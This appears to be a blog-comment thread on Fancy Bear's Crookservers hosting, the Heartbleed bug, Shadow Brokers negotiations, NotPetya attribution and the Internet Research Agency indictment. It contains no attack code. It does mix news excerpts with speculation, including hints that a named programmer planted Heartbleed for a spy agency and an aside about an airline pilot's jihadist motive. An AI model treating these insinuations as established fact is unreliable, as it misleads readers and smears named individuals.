1. The server hosting company for the server that was used in the APT28/Fancy Bear attacks is a UK-based company called Crookservers (that’s actually its name).
2. Crookservers is actually a server reseller. It leases servers from other companies based in France and Canada and then rents out access to those servers to its clients.
3. The owner of Crookservers is a man named Usman Ashraf. Social media shows that Ashraf lived in Oldham, UK, from 2010 to 2014 and now lives in Pakistan.
4. APT28/Fancy Bear hackers are believed to have rented servers from Crookserves for three years.
5. When Ashraf was notified in mid-2015 that his company’s servers were being used by hackers he claims to have promptly closed down the account. Keep in mind that this would be after the Bundestag hack (which was in May of 2015), but before the DNC server hack of March 2016.
6. The account Crookserver clients believed to be the hackers paid using Bitcoin and a couple of other cryptocurrencies
7. The presumed hackers demonstrated “poor tradecraft” (surprise!) according to the cybersecurity company Secureworks, which was hired by the BBC to analyze the information available about Crookservers.
8. One of the Crookserver users presumed to be an APT28/Fancy Bear hacker used the name “Roman Brecesku”.
9. On March 6, 2014, “Roman Brecesku” wrote to CrookServers saying “Hello, my server 91.121.108.153 was cracked. Please, reset the operating system with deleting all data.”
First, note that the 91.121.108.153 IP address isn’t the same command & control IP address found in the Bundestag and DNC malware (176.31.112.10). At the same time, it demonstrates that “Roman Brecesku” probably wasn’t the best server administrator from a security standpoint since his server got hacked (you’d think a Russian government hacker would be better at preventing hacks).
Also recall that, following the Bundestag hack, the 176.31.112.10 server used in the Bundestag attack was identified as using an old version of OpenSSL that would have left it vulnerable to the Heartbleed attack. And note that the Heartbleed attack was only publicly disclosed in April of 2014. So while we don’t know if this March 2014 hacking of one of this group’s servers was due to the Heartbleed attack, if it was due to Heartbleed it would have been some pretty sophisticated hackers used this exploit a month before the world learned about it.
10. The 176.31.112.10 command & control server was rented by someone using the name “Nikolay Mladenov” who paid using Bitcoin and Perfect Money.
11. That 176.31.112.10 was used in a 2014 spear-phishing attack on the 2014 Farnborough Air Show, and also a UK TV station in July of 2015. The 176.31.112.10 IP address was also found in the malware of those attacks (again, not exactly great “tradecraft”)
12. That 176.31.112.10 server was used until June 2015, at which point the server was deleted following the media reports of the Bundestag attack. And, of course, June 2015 is long before the March 2016 timing of the Fancy Bear/APT28 DNC hack. The UK TV station hack ALSO took place after June 2015.
13. A financial account used by “Nikolay Mladenov” was also used by “Roman Brecesku”, and two other presumed hacker pseudonyms, “Bruno Labrousse” and “Klaus Werner”, to hire more computers through Crookservers.
14. One of the servers rented by this group appears to have access to “advanced malware” capable of sophisticated attacks on iOS systems. That malware happens to be “XAgent”. And as security analyst Jeffrey Carr has noted before, the XAgent malware is already “in the wild”, as evidenced by the fact that a cybersecurity firm was able to get its hands on the source code for the malware and discuss it as part of its investigation into APT28/Fancy Bear.
So that all certainly gives us a better idea of what is know about the server used in this hack. And yet we’re left with that rather obvious question: how was the 176.31.112.10 server used as the command & control server for the malware deployed in the March 2016 DNC server attacks when it was allegedly shut down in 2015 following the Bundestag attacks?
“Over three years, Fancy Bear rented computers through Crookservers, covering its tracks using bogus identities, virtual private networks and hard-to-trace payment systems.”
So for three years the group labeled “Fancy Bear”/APT28 by cybersecurity companies was using a number of different servers from Crookservers. A company set up by a guy, Usman Ashraf, who used to be in the UK but now lives in Pakistan. But Crookservers didn’t actually own the serves themselves. It was a server reseller that leased them from a different company based in France and Canada:
So a server reseller that was set up in 2012 using the address of an Oldham, UK, newsagent. But the BBC couldn’t find any evidence that this address actually knew it was being listed as the address of Crookservers. Then address gets switched to Pakistan. And the guy behind the Crookservers, Usman Ashraf, appeared to be living in Oldham from 2010 to mid-2014 before moving to Pakistan. It’s, not not shady.
And then there’s the shady activity by the hackers themselves. Shady activity that appears to demonstrate “poor tradecraft” according to the Secureworks cybersecurity firm. And that poor tradecraft includes the 91.121.108.153 server getting hacked in March of 2014, as the message from presumed hacker “Roman Brecesku” indicates:
So this hacking crew appears to have issues with their servers getting hacked. At least the 91.121.108.153 server. Which probably has something to do with the “poor tradecraft” assessment.
But the fact that 176.31.112.10 IP was found in the malware for four different hacking operations might also have something to do with that “poor tradecraft” assessment. The IP address was found in the DNC server hack, the Bundestag hack, a Farnborough air show attack in 2014, and the UK TV station attack, although the server was apparently not under Fancy Bear’s control when the UK Tv station and DNC attacks took place:
“Bear malware used to attack a UK TV station and the DNC also contained this IP address, although the server was no longer in Fancy Bear’s control when these attacks occurred.”
So two of the four hacks attributed to the 176.31.112.10 server happened after APT28/Fancy Bear lost control of the server. Huh. You’d think this kind of discrepancy would raise more eyebrows.
From a trusted associate:
:Saw your post, Ptera, on the servers. Important to remember: at least at the time of the heartbleed announcement, the Open SSL board was majority German and Swede! I found that odd as the US is usually disproportionately represented on various standards committees or open source boards. Hell, that’s how we made the Internet our spy machine! But Open SSL isn’t like that, at least from my perception. And the flaw was in the code of a German PhD student... who worked for a DeutscheTelekom subsidiary after leaving the project in 2012. I can’t find anything on him after 2014, which is odd in itself.
side note: it’s amusing to me that the “who is Sastoshi Nakamoto?” mystery is still a thing! So many debunkings and frauds... yet I have not seen a debunking of the Siemens theory? It’s like watching people puzzle over the Malaysian air disaster. “Hmmm... the pilot was a supporter of jihad backing Anwar Ibrahim who just got sentenced that day... nah, that couldn’t have anything to do with it! what a mystery!” Sometimes the answers are right in front of our faces...
Who is Robin Seggelmann and did his Heartbleed break the internet?
Who is Robin Seggelmann and did his Heartbleed break the internet?
By Lia Timson
German computer programmer Robin Seggelman is the man whose coding mistake, now known as Heartbleed, has left mi...
Dr Seggelman, 31, from the small town of Oelde in north-west Germany, is a contributor to the Internet Engineering Task Force (IETF), a not-for-profit global group whose mission is to make the internet work better. He is attached to the Munster University of Applied Sciences in Germany, where, as research associate in the networking programming lab in the department of electrical engineering and computer science, he has published a number of papers, including his thesis on strategies to secure internet communications in 2012. He has been writing academic papers and giving talks on security matters since 2009, while still a PhD student.
His academic research influence index score of two, based on the number of scientific citations of his work, suggests an influential thinker at the early stages of his scientific career.
According to his Xing profile, Dr Seggelman has worked for Deutsche Telekom IT services subsidiary T‑Systems, possibly the largest such consultancy in Germany, since 2012, as a solutions architect.’
Enjoy!
Dave Emory
@Dave & trusted associate:
That’s a good catch about the Heartbleed bug being introduced into OpenSSL by Deutsche Telekom employee Robin Seggelmann. And there’s an interesting fun fact about that bug that highlights one of the aspects of the open source software movement: Seggelmann introduced that bug for code that was part of his PhD thesis (see section 7.2 on the “Heatbeat extension” that was added to OpenSSL).
What makes this fun fact so relevant to the open source software movement is the fact that if there was ever a time it would be easy to introduce a bug in your code and not catch it, it would be when you’re writing your PhD thesis. That’s generally not a time when someone has a lot of time on their hands. A robust and secure open source software movement will require A LOT of volunteers with A LOT of time on their hands. It’s one example of the benefits that leisure time gives a society: the time for people to collective do this voluntarily that no one is going to pay anyone to do. Like maintaining open source software, especially software like OpenSSL that’s used to encrypt internet traffic.
Recall that Heartbleed reportedly existed for two years before being discovered. So that’s not just Seggelmann’s fault because a lot of eyes either saw the same code and missed the flaw and few others were looking at all. Unless Seggelmann was asked by the BND or something to implant that flaw intentionally, it’s hard to be mad at the guy. He’s only of those only people who was actually trying to upgrade and maintain the code and bugs are unavoidable at some point. Especially subtle security flaws.
Also don’t forget the reports that anonymous sources claimed the NSA knew about Heartbleed for two years before it was disclosed. Which is not at all surprising if true. What would be surprising is if there weren’t all sorts of intelligence agencies aware of the bug shortly after it was introduced because they probably systematically review something as significant as OpenSSL updates. Along with who knows how many other private interests with the time and resources to pay people to quietly look for open source security vulnerabilities. Which again highlights the importance of a large pool of people with coding skills and lots of free time if society wants safe and secure free open source software. Leisure time pays dividends in a lot of different ways.
So with all that in mind, it’s worth noting that Seggelmann was also the author of a second OpenSSL security flaw that was found a couple months after the Heartbleed exploit become public and lots of eyes started looking at that OpenSSL code. And this new flaw was just one of 6 flaws in OpenSSL that was publicly announced at that point. It was reportedly a particular nasty four year old flaw that would allow “arbitrary code execution”. But it wasn’t the oldest of the 6 flaws. The oldest has been around since 1998. And it was extra nasty: it also allowed for the arbitrary execution of code. And man-in-the-middle attacks. And, again, this extra natsy bug was introduced in 1998 and never found (by anyone willing to tell) until 2014:
“In a post explaining how he discovered the CCS injection vulnerability (CVE-2014–0224), security researcher Masashi Kikuchi wrote that the ChangeCipherSpec (CCS) bug “has existed since the very first release of OpenSSL. The biggest reason why the bug hasn’t been found for over 16 years is that code reviews were insufficient, especially from experts who had experiences with TLS/SSL implementation.””
Finding bugs can be hard. Code reviews are time consuming. And it’s hard to come up with a better example these realities than a 16 year man-in-the-middle security flaw in something OpenSSL that no one discovered (at least no one inclined to tell everyone).
But that 1998 man-in-the-middle bug wasn’t Seggelmann’s bug in this batch of six found flaws. Seggelmann’s bug was introduced in 2010, the same year as Heartbleed was introduced. And like the man-in-the-middle attack, Seggelmann’s new bug allowed the “arbitrary execution of code” (which is quite a security flaw):
“Seggelmann is not completely to blame, of course. OpenSSL is an open source project. The ‘many eyes’ that look at this code failed to catch this bug”
Yep, even if Seggelmann is spy paid to insert bug, it’s hard to ignore the fact that the whole point the open source movement is the conviction that bugs will be found and fixed. Especially really important bugs like a bug that might allow man-in-the-middle attacks and the arbitrary execution of code via an open source internet standard like OpenSSL. This was a group failure by a very big group.
It also all raises the question of how many improvements have been made in recent years on open source review. On the plus side, a large number of potential security flaws were found in open source security software (264 flaws) after Google used its software testing tools to scan a large number of open source tools. On the minus side, this points towards the reality that mega-companies like Google are probably going to fill in the gap for a lot of this code review, which isn’t exactly living up to the open source ideal as open source becomes more and more a component of big business.
On another plus side, Google will have an extra incentive to find and publicly disclose a lot of security flaws it finds because it can already spy on almost everyone so easily in so many other ways. That’s a plus side that doubles as a minus side.
Well that’s quite a twist. The New York Times and The Intercept just published a pair of stories about the US efforts to recover the still unreleased contents of the Shadow Brokers’ stolen NSA hacking tools. But the stories go far beyond just the Shadow Brokers:
The stories detail a US intelligence operation that started in December of 2016 to track down the Shadow Brokers and obtain the still unreleased hacking tools. The US worked through an American businessman in Germany as an intermediary. That led US agents to Carlo, a hacker who, according to The Intercept, was located in Germany. But according to the New York Times, was located in Vienna, Austria. Carlo had reportedly previously worked with US intelligence agents. Carlo offered to provide US agents with the full set of hacking tools — so the US could know what was taken — along with the names of people in his network.
Carlo convinced US agents that he was indeed in possession of the still unreleased hacking tools (or at least knew the people who were) by giving advance notice of the Shadow Brokers’ subsequent public releases of more hacking tools. So, on some level, it appears that US agents did indeed find someone who had the hacking tools, or knew who had them.
But that’s when things got extra weird. Carlo wanted immunity from US prosecution as the price for returning the unreleased tools, which the US wouldn’t provide. Those negotiations broke down, and the US agents offered to just buy the hacking tools from the hacker instead. And that’s when the negotiations were taken over by a Russian in Germany.
This Russian is apparently someone known to US intelligence agencies as a kind of ‘fixer’ for Russia’s FSB with a direct link to former FSB director Nikolai Patrushev. He’s also someone who had previously dealt with American intelligence operatives, according to US and European officials. He’s also known to have previously worked for a Russian oligarch to help move illicit shipments of semiprecious metals for a Russian oligarch.
American intelligence agencies reportedly spent months tracking the Russian, including his flights to Berlin, his rendezvous with a mistress in Vienna and his trips home to St. Petersburg.
The Russian was also known to have ties to Eastern European cyber-criminals. And a history of money laundering with what is describe as a “thin legitimate cover business” of a nearly bankrupt company that sold portable grills for streetside sausage salesmen that was incorporated in Britain. So there’s a surprising amount of information about this mysterious Russian intermediary provided. Potentially enough information to identify this guy. But it’s unclear how anonymous this guy wants to be because he was willing to be interview by both The Intercept and The New York Times. Yep, these reports were both based on interview of this alleged FSB ‘fixer.’
So, if we’re to interpret this all at face value, the Russian government was behind the Shadow Brokers hack, they initially had a German hacker who was willing to return the hacking tools and expose his entire network in exchange for immunity. The hacker demonstrated a degree of closely with the Shadow Brokers by predicting the public releases. But when the US refused the immunity deal and offered to buy the tools instead, the Russians used known ‘fixer’ who had previously worked with US intelligence agents to negotiate that sale. And this FSB ‘fixer’ was willing to be interviewed and talk about this. Ummm....this seems like a really questionable story so far.
But it gets weirder. Much much weirder. The Russian also claimed to have a trove of compromising documents on Donald Trump, including a video of Trump consorting with prostitutes in a Moscow hotel room in 2013. It’s reported that there’s no evidence that such a video exists, although the New York Times report also includes a reference to an American businessman being shown a 15 second clip of a video showing a man in a room talking to two women. There’s no audio and there was no way to verify the man is Donald Trump. And the viewing took place at the Russian Embassy in Berlin, according to the businessman.
In addition to the video, the Russian also tried to sell other documents on Trump, including bank records, emails, and Russian intelligence data. The New York Times got to look at four of these documents that this mysterious Russian tried to pass along to the Americans (presumably the Russian provided them). One document featured Carter Page. Another features Robert and Rebekah Mercer. None of the documents could be verified and all four were drawn almost entirely from news reports. The New York Times article includes a comment by a former KGB officer saying the purported Russian intelligence documents also contained stylistic and grammatical usages not typically seen in Russian intelligence reports.
Early on, the asking price for the material was $10 million but quickly dropped to a $1 million. It was a few months after negotiations started that the American businessman was shown the video. The CIA reportedly didn’t actually want to get the purported dirt on Trump over concerns that this was an operation designed to sow discord between the White House and US intelligence agencies and the CIA decided they just wanted to stick with retrieving the hacking tools. The $1 million price was agreed upon and a $100,000 cash drop intended to be a down payment took place in September.
But there were a number of hurdles before that price was arrive at. By April of 2017, it appeared a deal for the sale was worked out. The Russian intermediary met with US agents and a hand off of a thumb drive took place at a West Berlin bar. The thumb drive was supposed to contained a sample of the hacking tools that was to come. But there was a big problem. That sample only contained hacking code that had already been publicly released. The CIA backed out of the deal. The Russian was reportedly furious and the negotiations continued, eventually leading up to the September $100,000 cash drop.
Additionally, according the New York Times report, at least four Russians with espionage and underworld connections have appeared in Central and Easter Europe offering to sell to US political operatives, private investigators, and spies compromising information that would corroborate the Steele dossier. Cody Shearer, an American political operative with ties to the Democratic Party, has also reportedly been traveling Eastern Europe for more than six months to secure this ‘kompromat’ from a different Russian.
So in September the $100,00 cash drop takes place, and a few weeks later the Russian began handling over data. But almost everything he delivered was the ‘kompromat’. Not the hacking tools. According to The Intercept, this kompromat included names of specific individuals and corporate entities allegedly tied to Russian interference in the 2016 U.S. election (so it would be a Russian government admission that it was involved in a US election interference campaign).
The Americans continued to press for the hacking tools. In December, the Russian said he was holding out on the hacking tools at the orders of senior Russian intelligence officials. So, early this year, the Americans issued an ultimatum: he had to start working for them and name everyone in his network or go back to Russian and never return to Europe. He took the latter option.
And this entire story, a story that could be interpreted as a Russian government admission of guilt over virtually ALL of the high-profile hacks targeting the US in recent years, appears to be largely backed up by the interviews this mysterious Russian FSB ‘fixer’ did with both The New York Times and The Intercept.
In fact, The Intercept was provided a document that describes an admission that the Russian provided to the Americans that, yes, there really has been an official Russian government effort to target US political activities starting in late 2014 or early 2015. The Russian told the Americans that he had no knowledge of a “master plan” to cause major disruption to U.S. election activities, but the effort was generally understood as a “green light” from Russian security officials to enlist cyber-related groups in probing and harassing activities directed at U.S. targets. That implies this entire alleged Russian government operation to sell ‘kompromat’ on Trump to the CIA apparently included telling the US agents that, yes, the Russian government really is behind this entire ‘Russian hacker’ campaign.
So, to summarize:
1. The CIA set out to retrieve the stolen hacking tools in December of 2016.
2. They came across a hacker, Carlo, who is either located in Germany or Austria. Carlo offered to return all the hacking tools and expose his network in exchange for immunity. Carlo had previously worked with US intelligence agents. Carlo demonstrated an ability to predict the Shadow Brokers’ public releases.
3. When the US refused to offer immunity and offered cash instead, a Russian in Germany known to be an FSB ‘fixer’ took over the negotiations. This figure is a known money-launderer with a history of interactions with US and European intelligence agencies.
4. The Russian first asked for $10 million, then $1 million. And soon started offering all sorts of ‘kompromat’ on Trump.
5. A few weeks after negotiations began, an American businessman was shown a 15 second video purportedly of Trump with prostitutes in a Moscow hotel in 2013, although it can’t be verified its Trump.
6. In August of 2017, the Russian handed over a thum drive contain a sample of the hacking tools. It was all publicly released content.
7. Negotiations stalled, then continued, and in September a $100,000 initial cash drop took place. The documents provided were all ‘kompromat’, with no hacking tools. The material included names of specific individuals and corporate entities allegedly tied to Russian interference in the 2016 U.S. election.
8. When pressed about the hacking tools, the Russian claimed senior Russian intelligence officials stopped him from releasing the hacking tools.
9. The Americans eventually banished the Russian from Europe after giving him a ‘work for us or go away’ offer.
10. This Russian was willing to be interview by the New York Times and The Intercept and even provided four example documents of the ‘kompromat’ he was trying to pass along to the Americans. It was all publicly available information that contained unusual syntax for Russian intelligence documents according to a former KGB officer.
11. This Russian reportedly told the Americans that the Russian government really did ‘green light’ this high-profile ‘I’m a Russian hacker!’ hacking campaign against US elections starting in late 2014 or early 2015 according to a document provided to The Intercept.
12. There are at least four Russians with espionage and underworld connections have appeared in Central and Eastern Europe, offering to sell kompromat to American political operatives, private investigators and spies that would corroborate the Steele dossier. Cody Shearer, a Democratic Party operative, has been trying to obtain such material from a different Russian.
So, if we are to accept all this, then the Russian government just had one of its ‘fixers’ basically admit that the Russian government was behind the Shadow Brokers hack and subsequent release of the hacking tools which posed a massive threat to computer security around the globe. And the Russian government wants this ‘fixer’ to openly peddle ‘kompromat’ on Donald Trump, but it’s either unverifiable material or publicly available. And this FSB ‘fixer’ was willing to talk to two news papers about all this:
“The cash, delivered in a suitcase to a Berlin hotel room in September, was intended as the first installment of a $1 million payout, according to American officials, the Russian and communications reviewed by The New York Times. The theft of the secret hacking tools had been devastating to the N.S.A., and the agency was struggling to get a full inventory of what was missing.”
Yep, this whole story isn’t just based on interviews with American intelligence officials. The mysterious Russian was also willing to be interviewed. And as we can see, it’s not like he’s providing an alternative spin to the version of events. He appears to more or less corroborate everything.
So who is this mysterious Russian? Well, we’re told that he is suspected of having murky ties to Russian intelligence and to Eastern European cybercriminals:
We’re also told that he’s a known ‘fixer’ for the FSB who had previously dealt with US intelligence. Along with the German hacker Carlo:
And he also has a history of money-laundering, prompting the former chief of Russia operations at the C.I.A. to make the point that there isn’t a clear distinction between organized criminals and Russian intelligence assets (which is, of course, the case for intelligence assets all over the world):
“There were other questions about the Russian’s reliability. He had a history of money laundering and a thin legitimate cover business — a nearly bankrupt company that sold portable grills for streetside sausage salesmen, according to British incorporation papers.”
That sure is a lot of potentially identifying information about this guy. Anyone know a Russian with a nearly bankrupt company that sold portable grills for streetside sausage salesmen, according to British incorporation papers? Because that just might be our mystery Russian.
And this mystery Russian was tracked by US officials for months traveling back and forth between Berlin, Vienna, and St. Petersburg:
So that’s our mystery Russian who was happy to talk with the New York Times and the Intercept on the condition of anonymity.
And then there’s Carlo the hacker. Carlo was apparently willing to turn over people in his network along with all the hacking tools in exchange for immunity:
So, if we assume that the Shadow Brokers are indeed a Russian government operation, they apparently first were using Carlo, a German hacker, as a front. But when the CIA turned downs Carlos demands for immunity, the Russians decided to drop the mask and have the mystery Russian directly negotiate a sales price. Again, doesn’t this seem incredibly odd?
So after the mystery Russian takes over the negotiations, he starts offering all sorts of ‘kompromat’, including a video of Trump with prostitutes which was shown to the American businessman intermediary as the Russian embassy in Berlin:
But the Americans weren’t interested in this kompromat, ostensibly over fears that this could exacerbate tensions between the White House and intelligence community. In addition, the rest of the kompromat appeared to be publicly available information and didn’t match traditional FSB grammar or language:
So the negotiations keep happening primarily over the hacking tools. And a $1 million price is arrived at. But when the example hacking tools are delivered, it’s all publicly available code:
Keep in in mind, as we’ll see in The Intercept piece below, Carlo correctly gave advance notice of Shadow Broker releases. And yet, when it came to this mystery Russian, he only provided hacking code samples that were available to everyone in the world.
But the negotiations continue, they come to an agreement in September, a $100,000 downpayment is made, and but the content delivered is all just the kompromat. And when pressed on this, the Russian claims that senior Russian intelligence officials prevented the return of the hacking tools:
“In December, the Russian said he told the American intermediary that he was providing the Trump material and holding out on the hacking tools at the orders of senior Russian intelligence officials.”
Note the phrasing here because it sure sounds like it’s the mystery Russian who is recounting this to the the reporter. And he’s recounting what amounts to an admission that the Russian government is indeed behind the Shadow Brokers...a hacking team that has done immense damage to people and organizations around the world by suddenly dumping those tools onto the internet.
And there are at least four Russians running around Europe trying to peddle kompromat on Trump:
So that’s what the New York Times reporter on this, which is largely what’s in The Intercept’s report. But there are some additional details. Like how Carlos was located in Germany, not Vienna.
The piece also includes the critical information that Carlos correctly gave advance notice to the Shadow Broker releases. It also includes reporting on a document that summarizes some rather remarkable admissions by the mystery Russian that, yes, there really has been an official Russian government effort to target US political activities starting in late 2014 or early 2015:
“The Russian told the American that he had first become aware of Russian efforts targeting U.S. political activities in late 2014 or early 2015, according to the documents reviewed by The Intercept. The Russian stated that he had no knowledge of a “master plan” to cause major disruption to U.S. election activities, but the effort was generally understood as a “green light” from Russian security officials to enlist cyber-related groups in probing and harassing activities directed at U.S. targets.”
Yep, this alleged FSB ‘fixer’ with cyber criminal ties — who has dealt with US intelligence agencies before — apparently decided to tell this American intermediary that he was indeed aware of a Russian government “green light” starting in late 2014 or early 2015 to target the US by enlisting cyber-related groups. It’s quite an admission!
And the kompromat he was passing along wasn’t just on Trump. It also included specific individuals and corporate entities involved with this interference campaign:
And this whole strange got started after US intelligence officials approach the American businessman in German and asked for his help. And it was this businessman who found the hacker in Germany who claimed to have the Shadow Broker content:
“The American was able to identify a hacker in Germany who claimed to have access to some of the stolen data believed to be held by the Shadow Brokers, and who accurately provided advance notice of several Shadow Broker data releases.”
And that, right there, is perhaps the only piece of information in this entire story that suggests that any of the shadowy figures involved with this story was actually involved with the Shadow Brokers.
And it doesn’t necessarily indicate this guy really was part of the Shadow Brokers. After all, if the Shadow Brokers really were interested in selling their treasure trove, arranging the sale over the Dark Web would be an obvious way to negotiate it and providing people advance notice of releases would be an obvious way to verify their credibility in these negotiations. So perhaps this mystery hacker was merely aware of some Dark Web sales pitches. For instance, imagine the Shadow Brokers were trying to find buyers on the Dark Web. Well, they might go to a Dark Web forum and say something like, “hey, we’re the Shadow Brokers. Want to buy our stuff?” And then they’d have to prove who they are...potentially by giving advance notice of releases. So if such sales pitches took place, anyone hacker on that forum would have the knowledge they need to pretend that they are the Shadow Brokers by relaying that same advance notice. Now, there’s no evidence that this is what happened, but it’s the kind of possibility we should consider.
So that’s the utterly bizarre story that just got released by The New York Times and The Intercept. A story that purports to reveal a Russian government psychological warfare operation designed to inflame partisan tensions in the US. And to inflame these tensions, the Russian strategy apparently involves basically admitting (via the interviews of the FSB ‘fixer’) that, yes, it’s running a psychological warfare operation against the US designed to inflame partisan tension. Which is a pretty odd strategy since one of the most effective ways to subdue those US partisan tensions is to have a Russian government operative basically come out and admit that its trying to inflame these tensions. And also admit to release the NSA hacking toolkit that caused all sorts of damage all over the world and could still potentially lead to much, much more damage. But that’s the story being peddling to the world right now.
Following up on the bizarre story about the CIA’s attempt to buy off the trove of NSA hacking tools possessed by the “Shadow Brokers”: The White House and UK government just issued near simultaneous statements formally blaming the Russian military for creating and releasing the “NotPetya” ransomware attack. They’re presumably blaming “Fancy Bear” for this since that’s the group attributed to the GRU. NotPetya is the attack that started in Ukraine and quickly spread around the world, causing billions in damage.
And while it was widely assumed that this attack originated in Russia given the fact that it started in Ukraine, there hadn’t before been any evidence linking the attack to the Russian military. And guess what, there still isn’t any actual evidence linking it to the Russian military. At least not any that’s been publicly released.
But that’s not most hilarious part of this ‘formal charge’. The most hilarious part is that the White House statement charging the Russian military makes no mention of the fact that NotPetya was based on Shadow Broker code that had already been publicly released:
“The White House statement made no mention of an embarrassing related fact: The NotPetya attacks took advantage of vulnerabilities identified by the National Security Agency and then made public by a group calling itself the Shadow Brokers.”
Uh...yeah, that’s a pretty embarrassing related fact. So the NSA hacking tools get dumped to the world, someone uses some of those tools to create a virulent ransomware attack, and almost a year later the White House formally charges the Russian military for this without even acknowledging that this code was publicly available.
Now, of course, it’s possible that NotPetya was created and released by the Russian military, in which case the charges of recklessness would be extremely appropriate given the potential damage this kind of malware could potentially cause. Damage like locking the computer systems in hospitals. So if actual evidence emerges that the Russian military was behind this then the world really should be pretty damn pissed at the GRU. It just, you know, very possible that any other hacker or government in the world could have done exactly the same thing after the Shadow Brokers released that code.
But here we are, with the US formally making this attribution and threatening “international consequences” in response. Maybe those consequences will be more sanctions, or perhaps some sort of covert measures:
So it looks like any nation or group in the world that would like to exacerbate tensions between the US and Russia has a pretty straightforward way to do that: create malware using the Shadow Brokers tools and release it in Ukraine. It’s all the evidence that will be required.
It’s been an indictment-o-rama for the Mueller probe of late. And that now includes 13 employees from the Internet Research Agency, a.k.a the ‘Kremlin troll farm’.
As we’ve already seen, the Internet Research Agency’s activities have previously received quite a bit of attention. Much of that attention has come in the form of narratives that depict a vast, sophisticated Kremlin-directed disinformation campaign that was designed to both help Donald Trump win the 2016 election while more generally trying to divide the US populace and stoke conflicts.
But as we’ve also seen, when you look at the details about the activity of the Internet Research Agency a much more haphazard picture emerges. There was indeed bizarre attempts to pay US activists to start provocative rallies. But those actions looked less like a real attempts to cause trouble and more like ‘proof of concept’ actions. And while the online trolling did have a strongly pro-Trump and anti-Hillary angle, it also looked more like a click-bait operation designed to make money selling ads than any serious attempt to impact the US election.
So did this new indictment shed new light on the troll farm’s activities that clearly establish that it was indeed a Kremlin-directed disinformation campaign designed to get Donald Trump elected? Well, it did shed some new light. And there were some surprises. Surprises like sending operatives to the US to scope out potential opportunities and the the theft of US identities to open bank accounts. And those surprises were pretty much the heart of the actual charges in the indictment: “The indictment charges all of the defendants with conspiracy to defraud the United States, three defendants with conspiracy to commit wire fraud and bank fraud, and five defendants with aggravated identity theft”:
““The indictment charges all of the defendants with conspiracy to defraud the United States, three defendants with conspiracy to commit wire fraud and bank fraud, and five defendants with aggravated identity theft,” a statement from the special counsel’s office said.”
A conspiracy to defraud the United States. That’s the general charge that appears to cover the ‘meddling in the US election’ campaign. And given the circumstances it’s not an unexpected charge.
Far more surprising were the charges issued against a subset of the defendants: Wire fraud, bank fraud, and aggravated identity theft. It’s surprising because when you look at the evidence of the impact this trolling campaign actually had on the 2016 election there’s no evidence that it had a meaningful impact at all. And yet the Internet Research Agency apparently sent operatives to the US while wire fraud, bank fraud, and identity theft was being carries out. That seems like a pretty big risk, at least for the operatives who traveled to the US:
But perhaps what’s most surprising is the budget of this operation, which apparently peaked at $1,250,000 per month as of September 2016:
And this elaborate, yet dubiously effective, psychological warfare operation was apparnetly started in 2014 according to the indictment:
And this operation kept going well after the 2016 election, as evidenced by the fact that the defendants apparently started destroying evidence in September 2017 after the FBI ‘busted their activity’:
So that’s an overview of the big indictment. An indictment that is widely characterized as providing ample proof of an elaborate, awe-inspiring massive psychological warfare operation ordered by Vladimir Putin.
And yet it’s hard to ignore the fact that it’s hard to imagine that this entire operation wouldn’t have been entirely ignored as just random noise if it wasn’t for the hacking of the DNC and subsequent release of those hacked documents. Because that’s how ineffectual this multi-year trolling operation appears to have been. Unless, of course, more evidence comes out later detailing a much broader and more impactful array of activities emanating from the troll farm. But at this point, even when you include all new details about this operation provided by the indictment, it’s not like those new details include new details pointing towards a previously unrecognized level of effectiveness of this trolling operation. The new details are on aspects like the identity theft and surprisingly large budget. A surprisingly large budget that’s still almost nothing compared to the +$2 billion spent overall during the campaign.
Additionally, as Adrien Chen, the American journalist who wrote one of the first big pieces on the Internet Research Agency in 2015, points out in the following piece responding to the indictments, the indictment doesn’t actually specify who ordered this professional trolling campaign. Was it someone higher in the Kremlin? Putin himself? Or, as some sources suggested to Chen back in 2015, was entire troll farm operation undertaken independently from the Kremlin, but done with the purpose of currying favor with Putin?
“Yet the indictment does not shed light on the extent to which the Kremlin and, specifically, the Russian President, Vladimir Putin, were involved in the Agency’s work. Nor does the indictment move us any closer to a conclusion regarding whether anyone in the Trump campaign colluded with the Russian operation. The chain of command as detailed by the indictment stops at Prigozhin, who has long been identified as the chief architect of the Agency. The Times has identified Prigozhin as Putin’s “go-to oligarch” for “a variety of sensitive and often-unsavory missions, like recruiting contract soldiers to fight in Ukraine and Syria.” Yet Mueller’s new indictment does not claim that Putin personally ordered the Agency to turn into a pro-Trump propaganda machine. When I was reporting on the Agency, some sources suggested to me that it was a project undertaken independently, in order to curry favor with Putin.”
And that’s one of the most notable aspect of this indictment: what it didn’t include. Like evidence that it really was a Kremlin-directed operation and not something either independently conducted by an oligarch trying to curry favor with Putin or, perhaps, just a for-profit operation based on the recognition that trolling Americans online can be incredibly profitable.
But there were some other rather surprising details in the indictment that Josh Marshall noted in a TPM Prime piece (“Notes on Mueller’s New Indictments”) (behind a paywall, well worth the price of admission) that add important context to not just the story of the Internet Research Agency but the hacking campaign too.
For starters, as Marshall notes, the indictment hints at one or more cooperating witness who provided a large amount of details about the US government. The indictment contains references to internal company emails. And while some of the Internet Research Agency operatives are named, some aren’t named. That points towards some of these individuals cooperating with US investigators. So it’s very possible the Mueller probe knows a lot more than is being let on at this point.
Also, as Marshall notes, it appears that the Internet Research Agency operatives were getting concerned about their operations being discovered back in 2014 and 2015 and started deleting email accounts back then: Here’s the particular passage in the indictment he points to (page 24 of the indictment):
So US investigators appear to have the kind of information that indicates that these Internet Research Agency employees were taking steps to cover their tracks going to 2014. Which, as Marshall point out in the piece, is rather eyebrow-raising because the first piece of journalism that exposed the Internet Research Agency was published by Adrien Chen in 2015. What was it that caused these individuals to delete email accounts over concerns that they were ‘discovered’ back in 2014? It’s a pretty significant mystery tucked away in that indictment. But when you consider that the indictment appears to indicate that US investigators have much more undisclosed information on the operations of the Internet Research Agency it will be interesting to see if information on what exactly spooked the troll farm back in 2014 and 2015 is eventually revealed.
And that brings us to one of the more remarkable stories about this entire #TrumpRussia saga. It’s a story that adds a significant context to both this new indictment of the Internet Research Agency that goes back to 2014 and also adds significant context to the prior reports on the ‘Cozy Bear’ of 2015. It was a story published last month in a Dutch publication about a remarkable series of hacks and cyber-battles between Dutch government hackers and....*drum roll*...Cozy Bear! Yep, Dutch government hackers in the AIVD intelligence agency reportedly hacked Cozy Bear’s hacking headquarters in 2014.
